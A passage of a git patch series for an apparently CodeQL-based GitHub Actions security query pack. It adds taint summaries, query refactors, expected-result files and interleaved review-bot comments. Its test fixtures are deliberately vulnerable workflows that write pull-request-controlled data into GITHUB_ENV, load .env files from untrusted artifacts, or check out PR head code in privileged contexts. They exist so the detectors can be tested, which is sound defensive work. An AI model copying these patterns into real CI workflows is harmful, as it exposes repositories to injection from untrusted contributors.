input.check-name | output.check-name | taint | manual | | envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | | flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | | frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | | frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | | game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | | getsentry/action-release | * | input.version | output.version | taint | manual | | getsentry/action-release | * | input.version_prefix | output.version | taint | manual | @@ -1124,6 +1137,7 @@ summaries | gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | | gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | | gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | | hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | | hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | | hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | 
@@ -1137,31 +1151,47 @@ summaries | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | | jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | | jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | | jsdaniell/create-json | * | input.json | output.successfully | taint | manual | | jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | | jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | | kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | | larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | | linkerd/linkerd2 | * | input.component | output.image | taint | manual | | linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | | linkerd/linkerd2 | * | input.tag | output.image | taint | manual | | mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | | mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint 
| manual | | mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | | mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | | metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | | mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | | mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | | neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | | neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | | novuhq/novu | * | input.docker_name | output.image | taint | manual | | philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | | ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | | salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | | shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | | shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | | streetsidesoftware/cspell | * | 
input.value | output.value | taint | manual | | streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | | suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | @@ -1169,6 +1199,7 @@ summaries | tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml new file mode 100644 index 000000000000..c33c90dbb9c6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -0,0 +1,25 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Load .env file + uses: aarcangeli/load-dotenv@v1.0.0 + with: + path: 'backend/new' + filenames: | + .env + .env.test + quiet: false + if-file-not-found: error + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 9c2fd6faf465..02aed1c05cbb 100644 
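Review bot: The fixture's header comment in `test7.yml` names the producer/consumer relationship but not the finding it is meant to pin, so a reader cannot tell from the file alone why the `aarcangeli/load-dotenv` step is expected to be reported. Since the `.expected` files encode that step as a sink reached from the `dawidd6/action-download-artifact` step, I would state the intent in the fixture, e.g. `# Expected: EnvVarInjection - the .env files written to GITHUB_ENV come from an artifact that the workflow_run producer (possibly a fork PR) controls`. The download step sets no `path:`, so the artifact is presumably extracted into the workspace root and `backend/new/.env` is only found if the artifact carries that layout; a one-line comment saying so would make the fixture self-explanatory.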
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -14,6 +14,7 @@ edges | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -45,6 +46,8 @@ nodes | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -62,3 +65,4 @@ subpaths | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 7ea9865c70a9..b3da13beda38 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -14,6 +14,7 @@ edges | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -45,5 +46,7 @@ nodes | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 2e0f79da4a00..5623964e5498 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -6,6 +6,9 @@ edges | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | provenance | | | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | | 
.github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$( Date: Fri, 12 Jul 2024 12:46:03 +0200 Subject: [PATCH 411/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e5e89afc471e..4b237b4bfd3c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.18 +version: 0.1.19 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index db9bdecf8b87..4d522db3f98a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.18 +version: 0.1.19 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7f77e89bbfa492e800e973152c0fbe2b4ece9240 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:31:12 +0200 Subject: [PATCH 412/707] feat(tests): Add test for checkout in composite action --- .../actions/dangerous-git-checkout/action.yml | 13 +++++++++++++ .../.github/workflows/untrusted_checkout3.yml | 13 +++++++++++++ .../CWE-829/UntrustedCheckoutCritical.expected | 8 ++++++++ 3 files changed, 34 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml new file mode 100644 index 000000000000..57058e7a076f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -0,0 +1,13 @@ +name: Dangerous git Checkout +description: "Git Checkout from PR code so we can run checks from forks" +runs: + using: "composite" + steps: + - name: Checkout repo + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 2 + - run: echo "foo" + shell: bash + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml new file mode 100644 index 000000000000..e0d32875ee70 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -0,0 +1,13 @@ +name: Test +on: + workflow_call: + workflow_run: + workflows: [Trigger] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: ./.github/actions/dangerous-git-checkout + - run: yarn test 
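Review bot: `untrusted_checkout3.yml` triggers on `workflow_call` and `workflow_run`, yet the composite action it calls checks out `${{ github.event.pull_request.head.sha }}`; as far as I recall neither event carries a `pull_request` object in its payload (a `workflow_run` payload exposes `workflow_run.pull_requests` instead), so at runtime the `ref` would resolve empty and `actions/checkout` would fall back to the triggering commit. That is fine for exercising the query's new composite-action path, but a reader may mistake the fixture for a realistic pattern. I would either switch the trigger to `pull_request_target:` or add a comment such as `# Fixture only: the PR-head ref expression is what the query keys on; under workflow_run it would resolve empty at runtime`.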
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4431d865417d..ce6d75bf1132 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,4 +1,7 @@ edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | 
@@ -332,6 +335,11 @@ edges | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | From 69d173f13c2463c60e04e1aa535dacfd658daaf4 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:47:52 +0200 Subject: [PATCH 413/707] fix(refactor): Remove unnecessary variables --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 1 - ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 1 - ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 1 - ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql | 4 +--- ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql | 4 +--- ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql | 4 +--- 6 files changed, 3 insertions(+), 12 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index cd7cefe2dd31..3fc94d1aa22d 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -16,7 +16,6 @@ import codeql.actions.security.ControlChecks from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where - job = checkout.getEnclosingJob() and job.isPrivileged() and job.getATriggerEvent() = event and event.getName() = "pull_request_target" and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index bbbab7bcab70..2656b22e1e31 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -20,7 +20,6 @@ query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where - j = checkout.getEnclosingJob() and j.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b9b3154debfc..0a83cc54ad69 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
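Review bot: Dropping `job = checkout.getEnclosingJob()` from `ImproperAccessControl.ql` removes the only binding between `job` and `checkout` visible in this hunk, so unless the remainder of the where-clause (outside the hunk) still relates them, the query now evaluates a cross product of every privileged `pull_request_target` job against every `MutableRefCheckoutStep` and will report checkouts that belong to other, unprivileged jobs. The TOCTOU queries in the same commit keep `j.getAStep() = checkout`, which is the binding I would expect here too, e.g. `job.getAStep() = checkout and` in place of the deleted line. If the intent was instead to also reach checkouts inside composite actions (which have no enclosing `LocalJob`), `job` should be removed from the `from` clause altogether, as `UntrustedCheckoutCritical.ql` does in this commit.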
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -18,7 +18,6 @@ import codeql.actions.security.ControlChecks from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check where - j = checkout.getEnclosingJob() and j.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index a0da81bde22a..02054ebbf0ab 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,10 +20,8 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } -from LocalJob j, PRHeadCheckoutStep checkout, PoisonableStep s +from PRHeadCheckoutStep checkout, PoisonableStep s where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index dba0dadb61bf..0675603af0f9 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -18,10 +18,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context 
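Review bot: `UntrustedCheckoutTOCTOUHigh.ql` still requires `j.getAStep() = checkout` on a `LocalJob`, so a `MutableRefCheckoutStep` inside a composite action (whose steps live under `runs:`, not under a job) is never selected, whereas `UntrustedCheckoutCritical.ql`/`High.ql`/`Medium.ql` in this same commit drop the job variable and therefore do reach such steps. If that asymmetry is deliberate (the `ControlCheck` logic may only be defined for job steps), a comment above the `from` clause saying so would prevent a future "fix"; otherwise dropping `j` here as well would align the TOCTOU queries with the others. The where-clause continues outside the hunk.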
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index ca91fcb9048a..8cc8e75c2af3 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -18,10 +18,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout where - j = checkout.getEnclosingJob() and - j.getAStep() = checkout and // the checkout occurs in a non-privileged context inNonPrivilegedContext(checkout) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." From 9917c46f6ffb2cd0f5e2b6fab9528090fdbdbe09 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:48:52 +0200 Subject: [PATCH 414/707] feat(core): Add StepsContainer class A StepsContainer is an abstract class that includes all nodes with steps: Runs and LocalJobs --- ql/lib/codeql/actions/Ast.qll | 34 +++--- ql/lib/codeql/actions/ast/internal/Ast.qll | 133 ++++++++++++++------- 2 files changed, 109 insertions(+), 58 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 0662f100fe42..5c6cdc141eed 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ 